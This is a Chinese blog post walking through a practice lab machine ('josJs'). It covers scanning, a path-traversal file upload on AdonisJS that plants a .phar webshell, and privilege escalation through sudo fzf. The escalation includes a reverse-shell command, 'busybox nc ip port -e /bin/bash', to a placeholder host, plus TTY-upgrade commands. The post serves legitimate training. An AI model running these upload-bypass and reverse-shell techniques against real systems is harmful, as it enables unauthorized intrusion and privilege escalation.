<!DOCTYPE html>
<html lang="en" color-mode="dark">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="Rufeii" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      靶机josJs 
      
      
      |
    
     Rufeii
  </title>

  
    <link rel="apple-touch-icon" href="/images/me.jpg">
    <link rel="icon" href="/images/me.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/me.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Rufeii</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/search/">
          <a href="/search/">Search</a>
        </li>
      
        <li class="nav-item" data-path="/links/">
          <a href="/links/">Links</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">靶机josJs</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2026-03-12 23:58:44
        </span>
        
      </div>
      <div class="markdown-body">
        <h2 id="userflag"><a href="#userflag" class="headerlink" title="userflag"></a>userflag</h2><p>nmap扫端口，出80和8080，一次查看发现仅仅是静态网页，而且识别不出是什么语言，于是扫目录</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">80</span><br><span class="line">[21:49:16] 200 -    2KB - /node<span class="built_in">_</span>modules/                                    </span><br><span class="line">[21:49:17] 200 -   66B  - /package.json                                     </span><br><span class="line">[21:49:17] 200 -   54KB - /package-lock.json</span><br><span class="line"></span><br><span class="line">8080</span><br><span class="line">有个/upload文件上传的服务</span><br></pre></td></tr></table></figure>

<p>那么80端口这3个玩意是是nodejs的核心文件</p>
<p><img src="/../images/achieve/2026/1/image-20260312224023800.png" alt="image-20260312224023800"></p>
<p>这里可以看框架是<strong>AdonisJS</strong>：一个 Node.js 全栈 Web 框架。并且暴露了中间件的版本，这里先放在这！然后这是一个web目录，不然怎么可以直接访问文件呢？80端口到这差不多</p>
<p>8080肯定就是nodejs起的服务了，那么能文件上传而且看到上传的目录</p>
<p><img src="/../images/achieve/2026/1/image-20260312224718646.png" alt="image-20260312224718646"></p>
<p>这里我联想到上次浅析的一个js的洞，通过session去目录穿越。</p>
<p><img src="/../images/achieve/2026/1/image-20260312225346118.png" alt="image-20260312225346118"></p>
<p><a href="https://rufeii.github.io/2026/02/22/%E6%B5%85%E6%9E%90CVE-2025-61686-ReactRouter-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E6%BC%8F%E6%B4%9E/">浅析CVE-2025-61686-ReactRouter-任意文件写入漏洞</a>  那么我的第一反应并是通过文件名去进行目录穿越，发现ok的！那么随之而来的就是如何去getshell，这里我当时傻了（没结合前面的信息），我就想你nodejs起的服务上传木马也访问不了啊！于是我就去搜文章</p>
<p><a target="_blank" rel="noopener" href="https://github.com/rix4uni/cvemapping/tree/d846c426343beebb3ca1d3fbaaa7545eebccf13e/2026/CVE-2026-21440">CVE-2026-21440</a>不看不知道，一看吓一跳都对应上了，懒得分析了，直接拿来打！但是不行哈！</p>
<p>于是还是得去分析，发现它其实就是上传木马到web目录，web目录在哪呢？80端口啊XD!!!</p>
<p>乐呵呵地去上传，文件后缀有黑名单，一顿绕过都不行，知识盲区了，最后得知可以上传phar且可以解析，那就好办了，一个木马上去，不就拿到shell了嘛！</p>
<p>非交互式的tty，两种办法起交互式tty</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">script /dev/null -c bash</span><br><span class="line">python3 -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br></pre></td></tr></table></figure>

<p>&#x2F;home&#x2F;welcome需要welcome权限，所以尝试提权，有个sudo可以用，然后mooi给我安利了一个比较好的提权命令查询的网站<a target="_blank" rel="noopener" href="https://gtfobins.org/gtfobins/fzf/">fzf | GTFOBins</a></p>
<p><img src="/../images/achieve/2026/1/image-20260312231234965.png" alt="image-20260312231234965"></p>
<p>允许任意用户以 welcome 用户 &#x2F; 用户组的身份（(welcome)），无需密码执行 &#x2F;usr&#x2F;bin&#x2F;fzf</p>
<p>两种提取命令：</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo /usr/bin/fzf --preview &#x27;busybox nc ip port -e /bin/bash&#x27;</span><br></pre></td></tr></table></figure>

<p>这个不用怕shell崩，它是会预先执行</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -u welcome fzf --bind &#x27;enter:execute(/bin/bash)&#x27;</span><br></pre></td></tr></table></figure>

<p>这个就对shell有些要求，加固一下，当时比较急mooi直接给了我加固的命令，有个伙伴真的太棒了</p>
<p>因为我们拿到的是伪交互式tty,ctrl+z之后输入下面命令</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">stty</span> raw -<span class="built_in">echo</span>; <span class="built_in">fg</span></span><br></pre></td></tr></table></figure>

<p>这个命令是 Unix&#x2F;Linux 终端中<strong>修复伪 TTY 交互体验</strong>的核心命令组合，所以反弹shell在kali进行，我前面win的nc不行然后执行提权命令就ok了</p>
<p><code>fg</code>就是将后台挂起的进程调回前台</p>
<p><img src="/../images/achieve/2026/1/image-20260312233045358.png" alt="image-20260312233045358"></p>
<h2 id="rootflag"><a href="#rootflag" class="headerlink" title="rootflag"></a>rootflag</h2><p>复现：</p>
<p>jorJs的root部分给个提示:journalctl</p>
<p>是一个查看日志的命令</p>
<p><img src="/../images/achieve/2026/1/image-20260312235551975.png" alt="image-20260312235551975"></p>
<p>MazeSec-journalctl-AdonisJS就是提权的密码，哈哈哈！</p>
<p>过程：现在看了简单哦，但是打可是花了我不少时间，冷静思考，不断复盘，持续进步！</p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2026/03/11/%E9%9D%B6%E6%9C%BADAV/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2026-03-12 23:58:44
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2026/03/15/%E9%9D%B6%E6%9C%BAStream/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#userflag"><span class="toc-text">userflag</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rootflag"><span class="toc-text">rootflag</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/rufeii/rufeii.github.io">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a href="/">Copyright © 2026 Rufeii</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        


        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E9%9D%B6%E6%9C%BAjosJs + '&url=' + https%3A%2F%2Frufeii.github.io%2F2026%2F03%2F12%2F%25E9%259D%25B6%25E6%259C%25BAjosJs%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://rufeii.github.io/2026/03/12/%E9%9D%B6%E6%9C%BAjosJs/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
